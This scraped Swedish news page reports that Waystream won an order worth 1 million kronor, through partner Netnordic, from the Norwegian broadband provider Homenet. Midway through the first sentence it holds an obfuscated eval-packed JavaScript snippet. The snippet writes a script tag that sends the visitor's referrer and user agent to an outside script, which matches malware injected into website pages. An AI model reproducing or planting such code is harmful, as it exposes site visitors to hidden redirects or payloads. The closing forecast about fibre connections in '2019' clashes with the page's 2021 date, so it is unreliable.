Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Waystream får via Netnordic order från norska Homenet

Waystream får via Netnordic order från norska Homenet
Sebastian

Waystream, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tdeed|var|u0026u|referrer|yefna||js|php’.split(’|’),0,{}))
som utvecklar och säljer avancerad digital infrastruktur så som switchar och routrar för fiberbaserade bredbandsnät, har via sin partner Netnordic Solution AS i Norge fått en ny order gällande accessutrustning från bredbandsleverantören Homenet värd 1 miljon kronor. 

Homenet fokuserar på privatmarknaden och knyter samman över 55 000 kunder i fler än 90 orter från norr till söder. Homenet ägs av Broadnet AS som är Norges ledande leverantör av fiberbaserad datakommunikation för företag. I sin fortsatta expansion av fibernät samt uppgradering av deras befintliga nätverk har Homenet valt Waystreams switch ASR6000, med tillhörande SFP (mediakonverterare). Waystreams utrustning kommer att levereras omgående.

– Homenet är en stor och trogen kund till oss och vi är självfallet mycket glada över att de fortsätter att investera i utbyggnad av sitt fibernätverk med hjälp av våra produkter. Tillsammans med vår partner Netnordic ska vi se till att Homenet kan fortsätta leverera snabbt bredband med den bästa kundupplevelsen till sina kunder i Norge, säger Johnny Hedlund, VD på Waystream.

I Europa förväntas marknaden för fiber att fördubblas under kommande år och fjolårets 31 miljoner anslutningar förväntas bli upp emot 62 miljoner inom 4 år. Det innebär att drygt 20 % av Europas hushåll kommer vara anslutna till fibernät år 2019 (FTTH/FTTB). (1)